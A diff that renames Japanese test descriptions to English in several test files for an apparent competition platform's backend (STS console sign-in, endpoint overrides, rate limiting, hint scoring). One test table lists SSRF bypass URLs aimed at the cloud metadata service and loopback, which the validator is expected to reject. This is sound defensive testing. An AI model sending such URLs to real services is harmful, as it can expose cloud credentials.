-  it("IN_PROGRESS な deployment は AssumeRole せず not_ready を返すべき", async () => {
+  it("should return not_ready without AssumeRole for IN_PROGRESS deployments", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ status: "IN_PROGRESS" })] });
     const result = await getConsoleSigninUrl(shared, TEAM_KEY, VALID_JOB_ID);
@@ -107,7 +107,7 @@ describe("getConsoleSigninUrl", () => {
     expect(fetchSpy).not.toHaveBeenCalled();
   });
 
-  it("PENDING な deployment は AssumeRole せず not_ready を返すべき", async () => {
+  it("should return not_ready without AssumeRole for PENDING deployments", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ status: "PENDING" })] });
     const result = await getConsoleSigninUrl(shared, TEAM_KEY, VALID_JOB_ID);
@@ -152,7 +152,7 @@ describe("getConsoleSigninUrl", () => {
     expect(result).toEqual({ kind: "not_ready" });
   });
 
-  it("正常系: STS AssumeRole + getSigninToken fetch を経由して signin login URL を返すべき", async () => {
+  it("normal case: should return signin login URL via STS AssumeRole + getSigninToken fetch", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     stsSend.mockResolvedValueOnce({
@@ -199,7 +199,7 @@ describe("getConsoleSigninUrl", () => {
     expect(fetchedUrl).not.toContain("SessionDuration");
   });
 
-  it("stackOutputs に ParticipantViewerRoleArn が無ければ not_ready を返すべき", async () => {
+  it("should return not_ready when stackOutputs lacks ParticipantViewerRoleArn", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ stackOutputs: JSON.stringify({}) })] });
     const result = await getConsoleSigninUrl(shared, TEAM_KEY, VALID_JOB_ID);
@@ -208,7 +208,7 @@ describe("getConsoleSigninUrl", () => {
     expect(fetchSpy).not.toHaveBeenCalled();
   });
 
-  it("CompetitorDeployRole から ParticipantViewerRole へ role chaining するべき", async () => {
+  it("should role-chain from CompetitorDeployRole to ParticipantViewerRole", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     stsSend.mockResolvedValueOnce({
@@ -286,7 +286,7 @@ describe("getConsoleSigninUrl", () => {
     expect(result).toEqual({ kind: "federation_endpoint_failed", status: 500 });
   });
 
-  it("STS AssumeRole が throw したら assume_role_failed + reason (error name) を返すべき (#705, #864)", async () => {
+  it("should return assume_role_failed + reason (error name) when STS AssumeRole throws (#705, #864)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     // Issue #864: reason は error.name (= 種別) のみを返す。 message / ARN は log に残さない。
@@ -301,7 +301,7 @@ describe("getConsoleSigninUrl", () => {
     }
   });
 
-  it("STS Credentials が empty なら assume_role_failed を返すべき (#705)", async () => {
+  it("should return assume_role_failed when STS Credentials are empty (#705)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     stsSend.mockResolvedValueOnce({ Credentials: undefined });
@@ -373,7 +373,7 @@ describe("getConsoleSigninUrl: not_ready 経路の structured log (#759)", () =>
     return undefined;
   }
 
-  it("IN_PROGRESS の deployment で portal.sso.not_ready.in_progress を info log すべき", async () => {
+  it("should info log portal.sso.not_ready.in_progress for IN_PROGRESS deployments", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ status: "IN_PROGRESS" })] });
     const result = await getConsoleSigninUrl(shared, TEAM_KEY, VALID_JOB_ID);
@@ -386,7 +386,7 @@ describe("getConsoleSigninUrl: not_ready 経路の structured log (#759)", () =>
     expect(payload?.status).toBe("IN_PROGRESS");
   });
 
-  it("namePrefix 未設定で portal.sso.not_ready.namePrefix_missing を info log すべき", async () => {
+  it("should info log portal.sso.not_ready.namePrefix_missing when namePrefix is unset", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [sampleRow({ namePrefix: undefined, status: "COMPLETE" })],
@@ -398,7 +398,7 @@ describe("getConsoleSigninUrl: not_ready 経路の structured log (#759)", () =>
     expect(payload?.jobId).toBe(VALID_JOB_ID);
   });
 
-  it("region 未設定で portal.sso.not_ready.region_missing を info log すべき", async () => {
+  it("should info log portal.sso.not_ready.region_missing when region is unset", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [sampleRow({ region: undefined })],
@@ -410,7 +410,7 @@ describe("getConsoleSigninUrl: not_ready 経路の structured log (#759)", () =>
     expect(payload?.jobId).toBe(VALID_JOB_ID);
   });
 
-  it("tenantId 未設定で portal.sso.not_ready.tenantId_missing を info log すべき", async () => {
+  it("should info log portal.sso.not_ready.tenantId_missing when tenantId is unset", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [sampleRow({ tenantId: undefined })],
@@ -422,7 +422,7 @@ describe("getConsoleSigninUrl: not_ready 経路の structured log (#759)", () =>
     expect(payload?.jobId).toBe(VALID_JOB_ID);
   });
 
-  it("competitorRoleArn 未設定で portal.sso.not_ready.competitorRoleArn_missing を info log すべき", async () => {
+  it("should info log portal.sso.not_ready.competitorRoleArn_missing when competitorRoleArn is unset", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [sampleRow({ competitorRoleArn: undefined })],
@@ -435,7 +435,7 @@ describe("getConsoleSigninUrl: not_ready 経路の structured log (#759)", () =>
     expect(payload?.tenantId).toBe("tenant-acme");
   });
 
-  it("ParticipantViewerRoleArn 不在で outputKeys を含む info log を emit すべき (世代不一致の即特定)", async () => {
+  it("should emit an info log with outputKeys when ParticipantViewerRoleArn is absent (quick generation-mismatch identification)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -456,7 +456,7 @@ describe("getConsoleSigninUrl: not_ready 経路の structured log (#759)", () =>
     expect(payload?.outputKeys).not.toContain("ParticipantViewerRoleArn");
   });
 
-  it("成功経路では not_ready log は 1 件も emit しないべき", async () => {
+  it("should not emit any not_ready logs on the success path", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     stsSend.mockResolvedValueOnce({

--- a/infrastructure/test/problem-deploy/participant-update.test.ts
+++ b/infrastructure/test/problem-deploy/participant-update.test.ts
@@ -99,7 +99,7 @@ describe("setDisplayTeamName", () => {
     expect(updateCmd.input.ReturnValues).toBe("ALL_NEW");
   });
 
-  it("正常系 (N deployments): team の全 editable 行を Promise.all で並列 update するべき", async () => {
+  it("normal case (N deployments): should Promise.all update all editable rows for the team", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [

--- a/infrastructure/test/problem-deploy/problem-endpoints-handler.test.ts
+++ b/infrastructure/test/problem-deploy/problem-endpoints-handler.test.ts
@@ -64,28 +64,28 @@ beforeEach(() => {
 });
 
 describe("listProblemEndpoints", () => {
-  it("team の deployment が無いときは unauthorized を返すべき", async () => {
+  it("should return unauthorized when the team has no deployments", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([]);
     const shared = buildShared({ problemsEndpoints: { "battle-1": [SLOT_FRONTEND] } });
     const r = await listProblemEndpoints(shared, "key", "battle-1");
     expect(r.kind).toBe("unauthorized");
   });
 
-  it("team に該当 problemId が無いときも unauthorized を返すべき", async () => {
+  it("should also return unauthorized when the team does not have the problemId", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([{ ...teamRow, problemId: "other-problem" }]);
     const shared = buildShared({ problemsEndpoints: { "battle-1": [SLOT_FRONTEND] } });
     const r = await listProblemEndpoints(shared, "key", "battle-1");
     expect(r.kind).toBe("unauthorized");
   });
 
-  it("metadata.endpoints[] が空 (= flag-only 問題) は no_endpoints を返すべき", async () => {
+  it("should return no_endpoints when metadata.endpoints[] is empty (flag-only problem)", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const shared = buildShared({ problemsEndpoints: {} });
     const r = await listProblemEndpoints(shared, "key", "battle-1");
     expect(r.kind).toBe("no_endpoints");
   });
 
-  it("override 無しで slot 一覧と default URL を返すべき", async () => {
+  it("should return slot list and default URLs with no overrides", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const ddbSend = vi.fn().mockResolvedValueOnce({ Items: [] });
     const shared = buildShared({
@@ -105,7 +105,7 @@ describe("listProblemEndpoints", () => {
     });
   });
 
-  it("override 行がある slot は effectiveUrl が override で埋まるべき", async () => {
+  it("effectiveUrl should be populated by override for slots with override rows", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const ddbSend = vi.fn().mockResolvedValueOnce({
       Items: [
@@ -135,14 +135,14 @@ describe("listProblemEndpoints", () => {
     });
   });
 
-  it("endpointsTableName が未配線なら misconfigured を返すべき", async () => {
+  it("should return misconfigured when endpointsTableName is unwired", async () => {
     const shared = buildShared({ endpointsTableName: "" });
     const r = await listProblemEndpoints(shared, "key", "battle-1");
     expect(r.kind).toBe("misconfigured");
     expect(mockedQueryTeamItems).not.toHaveBeenCalled();
   });
 
-  it("#703: defaultKey は常に metadata の default.key で埋まり、stackOutputs 無しでも UI が hint を出せるべき", async () => {
+  it("#703: should always populate defaultKey from metadata default.key so the UI can hint even without stackOutputs", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([
       { ...teamRow, stackOutputs: undefined, problemId: "battle-1" },
     ]);
@@ -167,7 +167,7 @@ describe("listProblemEndpoints", () => {
 });
 
 describe("upsertProblemEndpointOverride", () => {
-  it("override 不可 slot は slot_not_overridable を返し DDB Put しないべき", async () => {
+  it("should return slot_not_overridable without DDB Put for non-overridable slots", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const ddbSend = vi.fn();
     const shared = buildShared({
@@ -186,7 +186,7 @@ describe("upsertProblemEndpointOverride", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("URL が不正なら invalid_url を返し DDB Put しないべき", async () => {
+  it("should return invalid_url without DDB Put when the URL is invalid", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const ddbSend = vi.fn();
     const shared = buildShared({
@@ -205,7 +205,7 @@ describe("upsertProblemEndpointOverride", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("ftp:// など http(s) 以外の scheme は invalid_url を返すべき", async () => {
+  it("should return invalid_url for schemes other than http(s) such as ftp://", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const shared = buildShared({
       problemsEndpoints: { "battle-1": [SLOT_FRONTEND] },
@@ -238,7 +238,7 @@ describe("upsertProblemEndpointOverride", () => {
     ["IPv6-mapped IMDS (dotted)", "http://[::ffff:169.254.169.254]/latest/meta-data/"],
     ["IPv6-mapped IMDS (hex)", "http://[::ffff:a9fe:a9fe]/latest/meta-data/"],
     ["IPv6-mapped loopback", "http://[::ffff:127.0.0.1]/admin"],
-  ])("SSRF blocklist: %s host は invalid_url を返すべき", async (_, url) => {
+  ])("SSRF blocklist: should return invalid_url for %s host", async (_, url) => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const ddbSend = vi.fn();
     const shared = buildShared({
@@ -257,7 +257,7 @@ describe("upsertProblemEndpointOverride", () => {
     expect(ddbSend).not.toHaveBeenCalled();
   });
 
-  it("metadata に無い slot は unknown_slot を返すべき", async () => {
+  it("should return unknown_slot for slots missing from metadata", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const shared = buildShared({
       problemsEndpoints: { "battle-1": [SLOT_FRONTEND] },
@@ -274,7 +274,7 @@ describe("upsertProblemEndpointOverride", () => {
     expect(r.kind).toBe("unknown_slot");
   });
 
-  it("成功時は DDB Put して view を返すべき", async () => {
+  it("should DDB Put and return the view on success", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const ddbSend = vi
       .fn()
@@ -322,7 +322,7 @@ describe("upsertProblemEndpointOverride", () => {
 });
 
 describe("deleteProblemEndpointOverride", () => {
-  it("metadata に無い slot は unknown_slot を返すべき", async () => {
+  it("should return unknown_slot for slots missing from metadata", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const shared = buildShared({
       problemsEndpoints: { "battle-1": [SLOT_FRONTEND] },
@@ -332,7 +332,7 @@ describe("deleteProblemEndpointOverride", () => {
     expect(r.kind).toBe("unknown_slot");
   });
 
-  it("成功時は DDB DeleteItem を発行して view を返すべき", async () => {
+  it("should issue DDB DeleteItem and return the view on success", async () => {
     mockedQueryTeamItems.mockResolvedValueOnce([teamRow]);
     const ddbSend = vi.fn().mockResolvedValueOnce({}).mockResolvedValueOnce({ Items: [] });
     const shared = buildShared({

--- a/infrastructure/test/problem-deploy/problem-endpoints-resolve.test.ts
+++ b/infrastructure/test/problem-deploy/problem-endpoints-resolve.test.ts
@@ -31,7 +31,7 @@ const override = (slotName: string, url: string): EndpointOverrideItem => ({
 });
 
 describe("resolveEndpoints", () => {
-  it("CFn output 値を default URL として採用すべき (array 形式)", () => {
+  it("should adopt the CFn output value as the default URL (array form)", () => {
     const stackOutputs = JSON.stringify([
       { OutputKey: "FrontendUrl", OutputValue: "https://front.example.com/" },
     ]);
@@ -51,7 +51,7 @@ describe("resolveEndpoints", () => {
     ]);
   });
 
-  it("CFn output に該当 key が無いとき defaultUrl は undefined、effectiveUrl も undefined になるべき", () => {
+  it("should return defaultUrl and effectiveUrl as undefined when the CFn output key is missing", () => {
     const result = resolveEndpoints({
       slots: [slot("api", "MissingKey")],
       stackOutputs: JSON.stringify([]),
@@ -61,7 +61,7 @@ describe("resolveEndpoints", () => {
     expect(result).toEqual([{ slot: "api", overridable: false, defaultKey: "MissingKey" }]);
   });
 
-  it("override がある slot は effectiveUrl が override で埋まるべき", () => {
+  it("effectiveUrl should be populated by override for slots with an override", () => {
     const stackOutputs = JSON.stringify([
       { OutputKey: "FrontendUrl", OutputValue: "https://front.example.com/" },
     ]);
@@ -77,7 +77,7 @@ describe("resolveEndpoints", () => {
     });
   });
 
-  it("appendPath を含めた default URL を組み立てるべき", () => {
+  it("should assemble the default URL including appendPath", () => {
     const stackOutputs = JSON.stringify([
       { OutputKey: "BaseUrl", OutputValue: "https://api.example.com/" },
     ]);
@@ -93,7 +93,7 @@ describe("resolveEndpoints", () => {
     expect(result[0]?.defaultUrl).toBe("https://api.example.com/users");
   });
 
-  it("label / description を保持すべき", () => {
+  it("should preserve label / description", () => {
     const result = resolveEndpoints({
       slots: [slot("frontend", "FrontendUrl", { label: "Frontend", description: "nginx" })],
       stackOutputs: undefined,
@@ -106,7 +106,7 @@ describe("resolveEndpoints", () => {
     });
   });
 
-  it("metadata.endpoints[] が空なら空配列を返すべき", () => {
+  it("should return an empty array when metadata.endpoints[] is empty", () => {
     expect(resolveEndpoints({ slots: [], stackOutputs: undefined, overrides: [] })).toEqual([]);
   });
 });

--- a/infrastructure/test/problem-deploy/problem-endpoints-routes.test.ts
+++ b/infrastructure/test/problem-deploy/problem-endpoints-routes.test.ts
@@ -46,12 +46,12 @@ function bearer(token: string): HeadersInit {
 describe("GET /portal/me/problems/:problemId/endpoints", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("Authorization header が無いときは 401 を返すべき", async () => {
+  it("should return 401 when the Authorization header is missing", async () => {
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints");
     expect(res.status).toBe(StatusCodes.UNAUTHORIZED);
   });
 
-  it("problemId が pattern と合わないときは 400 を返すべき", async () => {
+  it("should return 400 when problemId does not match the pattern", async () => {
     const res = await app.request("/portal/me/problems/INVALID_UPPER/endpoints", {
       headers: bearer("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"),
     });
@@ -59,7 +59,7 @@ describe("GET /portal/me/problems/:problemId/endpoints", () => {
     expect(mocks.listProblemEndpoints).not.toHaveBeenCalled();
   });
 
-  it("ok outcome は 200 と endpoints / teamId を返すべき", async () => {
+  it("ok outcome should return 200 with endpoints / teamId", async () => {
     mocks.listProblemEndpoints.mockResolvedValueOnce({
       kind: "ok",
       teamId: "team-x",
@@ -81,7 +81,7 @@ describe("GET /portal/me/problems/:problemId/endpoints", () => {
     expect(body.endpoints).toHaveLength(1);
   });
 
-  it("no_endpoints outcome は 404 を返すべき", async () => {
+  it("no_endpoints outcome should return 404", async () => {
     mocks.listProblemEndpoints.mockResolvedValueOnce({ kind: "no_endpoints" });
     const res = await app.request("/portal/me/problems/hello-world/endpoints", {
       headers: bearer("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"),
@@ -89,7 +89,7 @@ describe("GET /portal/me/problems/:problemId/endpoints", () => {
     expect(res.status).toBe(StatusCodes.NOT_FOUND);
   });
 
-  it("unauthorized outcome は 401 を返すべき", async () => {
+  it("unauthorized outcome should return 401", async () => {
     mocks.listProblemEndpoints.mockResolvedValueOnce({ kind: "unauthorized" });
     const res = await app.request("/portal/me/problems/hello-world/endpoints", {
       headers: bearer("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"),
@@ -101,7 +101,7 @@ describe("GET /portal/me/problems/:problemId/endpoints", () => {
 describe("POST /portal/me/problems/:problemId/endpoints/:slot", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("body が JSON でなければ 400 を返すべき", async () => {
+  it("should return 400 when the body is not JSON", async () => {
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints/frontend", {
       method: "POST",
       headers: bearer("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"),
@@ -111,7 +111,7 @@ describe("POST /portal/me/problems/:problemId/endpoints/:slot", () => {
     expect(mocks.upsertProblemEndpointOverride).not.toHaveBeenCalled();
   });
 
-  it("slot が pattern と合わないなら 400 を返すべき", async () => {
+  it("should return 400 when slot does not match the pattern", async () => {
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints/UPPER_CASE", {
       method: "POST",
       headers: bearer("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"),
@@ -120,7 +120,7 @@ describe("POST /portal/me/problems/:problemId/endpoints/:slot", () => {
     expect(res.status).toBe(StatusCodes.BAD_REQUEST);
   });
 
-  it("invalid_url outcome は 400 を返すべき", async () => {
+  it("invalid_url outcome should return 400", async () => {
     mocks.upsertProblemEndpointOverride.mockResolvedValueOnce({ kind: "invalid_url" });
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints/frontend", {
       method: "POST",
@@ -130,7 +130,7 @@ describe("POST /portal/me/problems/:problemId/endpoints/:slot", () => {
     expect(res.status).toBe(StatusCodes.BAD_REQUEST);
   });
 
-  it("slot_not_overridable outcome は 409 を返すべき", async () => {
+  it("slot_not_overridable outcome should return 409", async () => {
     mocks.upsertProblemEndpointOverride.mockResolvedValueOnce({ kind: "slot_not_overridable" });
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints/frontend", {
       method: "POST",
@@ -140,7 +140,7 @@ describe("POST /portal/me/problems/:problemId/endpoints/:slot", () => {
     expect(res.status).toBe(StatusCodes.CONFLICT);
   });
 
-  it("ok outcome は 200 と更新後 view を返すべき", async () => {
+  it("ok outcome should return 200 with the updated view", async () => {
     mocks.upsertProblemEndpointOverride.mockResolvedValueOnce({
       kind: "ok",
       teamId: "team-x",
@@ -168,7 +168,7 @@ describe("POST /portal/me/problems/:problemId/endpoints/:slot", () => {
 describe("DELETE /portal/me/problems/:problemId/endpoints/:slot", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("ok outcome は 200 を返すべき", async () => {
+  it("ok outcome should return 200", async () => {
     mocks.deleteProblemEndpointOverride.mockResolvedValueOnce({
       kind: "ok",
       teamId: "team-x",
@@ -181,7 +181,7 @@ describe("DELETE /portal/me/problems/:problemId/endpoints/:slot", () => {
     expect(res.status).toBe(StatusCodes.OK);
   });
 
-  it("unknown_slot outcome は 400 を返すべき", async () => {
+  it("unknown_slot outcome should return 400", async () => {
     mocks.deleteProblemEndpointOverride.mockResolvedValueOnce({ kind: "unknown_slot" });
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints/frontend", {
       method: "DELETE",
@@ -190,7 +190,7 @@ describe("DELETE /portal/me/problems/:problemId/endpoints/:slot", () => {
     expect(res.status).toBe(StatusCodes.BAD_REQUEST);
   });
 
-  it("no_endpoints outcome は 404 を返すべき", async () => {
+  it("no_endpoints outcome should return 404", async () => {
     mocks.deleteProblemEndpointOverride.mockResolvedValueOnce({ kind: "no_endpoints" });
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints/frontend", {
       method: "DELETE",
@@ -199,7 +199,7 @@ describe("DELETE /portal/me/problems/:problemId/endpoints/:slot", () => {
     expect(res.status).toBe(StatusCodes.NOT_FOUND);
   });
 
-  it("unauthorized outcome は 401 を返すべき", async () => {
+  it("unauthorized outcome should return 401", async () => {
     mocks.deleteProblemEndpointOverride.mockResolvedValueOnce({ kind: "unauthorized" });
     const res = await app.request("/portal/me/problems/hello-world-battle/endpoints/frontend", {
       method: "DELETE",

--- a/infrastructure/test/problem-deploy/problem-template-participant-viewer-role.test.ts
+++ b/infrastructure/test/problem-deploy/problem-template-participant-viewer-role.test.ts
@@ -74,7 +74,7 @@ const RESOURCE_STAR_OK_SIDS = new Set([
 
 describe("problem template ParticipantViewerRole (#744)", () => {
   for (const t of TEMPLATES) {
-    it(`${t.path} は ParticipantViewerRole と Output を宣言すべき`, () => {
+    it(`\${t.path} should declare ParticipantViewerRole and its Output`, () => {
       const template = readTemplate(t.path);
       const role = roleBlock(template);
 

--- a/infrastructure/test/problem-deploy/rate-limiter.test.ts
+++ b/infrastructure/test/problem-deploy/rate-limiter.test.ts
@@ -5,14 +5,14 @@ import {
 } from "../../lib/problem-deploy/handlers/shared/rate-limiter";
 
 describe("createRateLimiter", () => {
-  it("初回 take は許可されるべき (lazy 初期化、 capacity 満タン)", () => {
+  it("the first take should be allowed (lazy init, full capacity)", () => {
     const limiter = createRateLimiter({ now: () => 0 });
     const out = limiter.take("k", RATE_LIMITS.WRITE_LOW);
     expect(out.allowed).toBe(true);
     expect(out.retryAfterSec).toBe(0);
   });
 
-  it("capacity を使い切ったら次の take は拒否されるべき", () => {
+  it("should reject the next take once capacity is exhausted", () => {
     const t = 0;
     const limiter = createRateLimiter({ now: () => t });
     const config = { capacity: 3, refillPerSec: 0 };
@@ -24,7 +24,7 @@ describe("createRateLimiter", () => {
     expect(denied.retryAfterSec).toBeGreaterThanOrEqual(1);
   });
 
-  it("時間経過で refill されるべき (= refillPerSec=1 で 1 秒後に 1 トークン)", () => {
+  it("should refill over time (1 token per second at refillPerSec=1)", () => {
     let t = 0;
     const limiter = createRateLimiter({ now: () => t });
     const config = { capacity: 1, refillPerSec: 1 };
@@ -34,7 +34,7 @@ describe("createRateLimiter", () => {
     expect(limiter.take("k", config).allowed).toBe(true);
   });
 
-  it("capacity を超えて refill されないべき (= burst cap)", () => {
+  it("should not refill beyond capacity (burst cap)", () => {
     let t = 0;
     const limiter = createRateLimiter({ now: () => t });
     const config = { capacity: 2, refillPerSec: 5 };
@@ -48,7 +48,7 @@ describe("createRateLimiter", () => {
     expect(limiter.take("k", config).allowed).toBe(false);
   });
 
-  it("別 key は独立した bucket を持つべき (team1 が使い切っても team2 は影響なし)", () => {
+  it("different keys should have independent buckets (team1 exhaustion doesn't affect team2)", () => {
     const limiter = createRateLimiter({ now: () => 0 });
     const config = { capacity: 1, refillPerSec: 0 };
     expect(limiter.take("team1", config).allowed).toBe(true);
@@ -56,7 +56,7 @@ describe("createRateLimiter", () => {
     expect(limiter.take("team2", config).allowed).toBe(true);
   });
 
-  it("retryAfterSec は次に 1 トークン取得可能な時間に近似されるべき (= refillPerSec 由来)", () => {
+  it("retryAfterSec should approximate the time until the next token is available (derived from refillPerSec)", () => {
     const t = 0;
     const limiter = createRateLimiter({ now: () => t });
     const config = { capacity: 1, refillPerSec: 0.5 };
@@ -68,7 +68,7 @@ describe("createRateLimiter", () => {
     expect(denied.retryAfterSec).toBeLessThanOrEqual(2);
   });
 
-  it("refillPerSec=0 (= 完全停止) の場合は retryAfterSec を 60 にクランプすべき", () => {
+  it("should clamp retryAfterSec to 60 when refillPerSec=0 (full stop)", () => {
     const limiter = createRateLimiter({ now: () => 0 });
     const config = { capacity: 1, refillPerSec: 0 };
     expect(limiter.take("k", config).allowed).toBe(true);
@@ -77,7 +77,7 @@ describe("createRateLimiter", () => {
     expect(denied.retryAfterSec).toBe(60);
   });
 
-  it("reset() で全 bucket を消すべき", () => {
+  it("reset() should wipe all buckets", () => {
     const limiter = createRateLimiter({ now: () => 0 });
     const config = { capacity: 1, refillPerSec: 0 };
     limiter.take("k", config);
@@ -86,22 +86,22 @@ describe("createRateLimiter", () => {
     expect(limiter.take("k", config).allowed).toBe(true);
   });
 
-  it("RATE_LIMITS.WRITE_LOW は 10 burst / 0.2 RPS (= 12 RPM) であるべき (= 人手 write 一般)", () => {
+  it("RATE_LIMITS.WRITE_LOW should be 10 burst / 0.2 RPS (12 RPM) (general human writes)", () => {
     expect(RATE_LIMITS.WRITE_LOW.capacity).toBe(10);
     expect(RATE_LIMITS.WRITE_LOW.refillPerSec).toBe(0.2);
   });
 
-  it("Issue #870: RATE_LIMITS.WRITE_VERY_LOW は 3 burst / 0.1 RPS (= 6 RPM) であるべき (= submit-flag brute force 抑制)", () => {
+  it("Issue #870: RATE_LIMITS.WRITE_VERY_LOW should be 3 burst / 0.1 RPS (6 RPM) (submit-flag brute force throttle)", () => {
     expect(RATE_LIMITS.WRITE_VERY_LOW.capacity).toBe(3);
     expect(RATE_LIMITS.WRITE_VERY_LOW.refillPerSec).toBe(0.1);
   });
 
-  it("RATE_LIMITS.READ_HIGH は 60 burst / 2 RPS であるべき (= 5s polling 阻害しない)", () => {
+  it("RATE_LIMITS.READ_HIGH should be 60 burst / 2 RPS (doesn't impede 5s polling)", () => {
     expect(RATE_LIMITS.READ_HIGH.capacity).toBe(60);
     expect(RATE_LIMITS.READ_HIGH.refillPerSec).toBe(2);
   });
 
-  it("RATE_LIMITS.READ_MID は 60 burst / 1 RPS であるべき (= 60s polling は余裕)", () => {
+  it("RATE_LIMITS.READ_MID should be 60 burst / 1 RPS (ample for 60s polling)", () => {
     expect(RATE_LIMITS.READ_MID.capacity).toBe(60);
     expect(RATE_LIMITS.READ_MID.refillPerSec).toBe(1);
   });

--- a/infrastructure/test/problem-deploy/reveal-hint.test.ts
+++ b/infrastructure/test/problem-deploy/reveal-hint.test.ts
@@ -55,7 +55,7 @@ function sampleRow(over: Record<string, unknown> = {}) {
 }
 
 describe("revealHint (#742 Phase 3)", () => {
-  it("team が見つからなければ unauthorized を返すべき", async () => {
+  it("should return unauthorized when the team is not found", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [] });
     const result = await revealHint(shared, buildScoringMap(), TEAM_KEY, "hello-world", "hint-1");
@@ -105,7 +105,7 @@ describe("revealHint (#742 Phase 3)", () => {
     expect(result.kind).toBe("unknown_hint");
   });
 
-  it("初回 reveal: UpdateItem が list_append + score ADD で呼ばれ、 ok を返すべき", async () => {
+  it("first reveal: UpdateItem should be called with list_append + score ADD and return ok", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ score: 100 })] });
     ddbSend.mockResolvedValueOnce({ Attributes: { score: 90 } });
@@ -193,7 +193,7 @@ describe("revealHint (#742 Phase 3)", () => {
   describe("competition scoring gate (Issue #1005)", () => {
     const eventRow = sampleRow({ eventId: "EVT1", score: 0 });
 
-    it("Event 行が無いときは fail-closed で scoring_not_started を返し UpdateItem を呼ばないべき", async () => {
+    it("should fail-closed with scoring_not_started and not call UpdateItem when the Event row is missing", async () => {
       const { shared, ddbSend } = buildShared();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
       ddbSend.mockResolvedValueOnce({}); // EventMeta GetItem returns no Item
@@ -203,7 +203,7 @@ describe("revealHint (#742 Phase 3)", () => {
       expect(ddbSend).toHaveBeenCalledTimes(2);
     });
 
-    it("now < startsAt なら scoring_not_started を返し startsAt を含めるべき", async () => {
+    it("should return scoring_not_started with startsAt when now < startsAt", async () => {
       const future = new Date(Date.now() + 60 * 60 * 1000).toISOString();
       const { shared, ddbSend } = buildShared();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
@@ -212,7 +212,7 @@ describe("revealHint (#742 Phase 3)", () => {
       expect(out).toEqual({ kind: "scoring_not_started", startsAt: future });
     });
 
-    it("endsAt 設定 + now > endsAt なら scoring_ended を返すべき", async () => {
+    it("should return scoring_ended when endsAt is set and now > endsAt", async () => {
       const past = new Date(Date.now() - 60 * 60 * 1000).toISOString();
       const before = new Date(Date.now() - 2 * 60 * 60 * 1000).toISOString();
       const { shared, ddbSend } = buildShared();
@@ -224,7 +224,7 @@ describe("revealHint (#742 Phase 3)", () => {
       expect(out).toEqual({ kind: "scoring_ended", endsAt: past });
     });
 
-    it("status=ENDED なら startsAt があっても scoring_ended を返すべき", async () => {
+    it("should return scoring_ended when status=ENDED, even if startsAt is set", async () => {
       const before = new Date(Date.now() - 60 * 60 * 1000).toISOString();
       const { shared, ddbSend } = buildShared();
       ddbSend.mockResolvedValueOnce({ Items: [eventRow] });
@@ -233,7 +233,7 @@ describe("revealHint (#742 Phase 3)", () => {
       expect(out.kind).toBe("scoring_ended");
     });
 
-    it("scoringLocked=true は startsAt OK でも scoring_locked を返すべき", async () => {
